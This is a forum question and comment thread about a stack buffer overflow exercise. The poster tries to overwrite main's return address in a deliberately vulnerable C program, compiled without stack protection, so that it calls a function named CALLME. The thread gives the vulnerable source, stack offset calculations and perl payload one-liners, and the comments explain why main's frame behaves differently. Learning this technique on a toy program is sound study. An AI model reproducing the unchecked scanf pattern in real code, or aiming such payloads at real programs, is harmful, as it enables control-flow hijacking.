# override return address of main in c

Tags: security

i'm trying to execute a buffer overflow attack on a program written in c, i'm using GNU/Linux (Ubuntu 16.04 LTS).
this is the source code:

```
#include<stdio.h>
void CALLME(){
    puts("successful!");
}
int main(void){
    char s[16];
    scanf("%s",s);
}
```

what i want to do is override the return address of main so that after main function, the function CALLME will be executed.
i compile the program with

```
gcc -m32 -fno-stack-protector -o prog prog.c
```

use command:

```
nm prog | grep CALLME
```

i got the address of CALLME: 0804845b

disassemble main in gdb i found that: during main function, the return address is located at 8(%ebp) and the address of string s is at -0x18(%ebp). So the difference is 0x8 + 0x18 = 32

i try to exploit:

perl -e 'print "a" x 32 . "\x5b\x84\x04\x08"' | ./main

it didn't work.

```
Segmentation fault (core dumped)
```

Why ? Is main function more special ? Because in other functions (i made) that have a similar vulnerability it works ?

NOTE: i don't think about ASLR, some guys said that happens only when i compile gcc -pie ... and other stuffs.

Comment: `s` starts at `-0x18(%ebp)` and your return address is at `8(%ebp)`. Since `s` only has 16 bytes allocated to it, it sounds like you have 8 + 0x18 - 16 = 16 bytes on the stack between `-8(%ebp)` and `8(%ebp)` that are important but that you're overwriting with a's. You need to examine the stack frame for `main` in more detail.

Comment: i don't think so. as i said : if i move 2 line in main function to a function i made (call it run()), then in main: i call run(), my attack was successful, the difference is return address (of run()) is at 4(%ebp), and s start at -0x18(%ebp), i exploit:                     perl -e 'print "a"x28 . "\x5b\x84\x04\x08"' | ./main

Comment: "I don't think so" doesn't sound very confident. You are writing `int main(void)` in your code, but in reality, `main` takes two arguments, `int argc` and `char *argv[]` so you're overwriting those at least. Did you also check the code that sets up the stack frame more carefully to see what it is trying to save and then later restore?

Comment: ah. maybe there're some important stuffs between them. thanks for your help. i'll research more.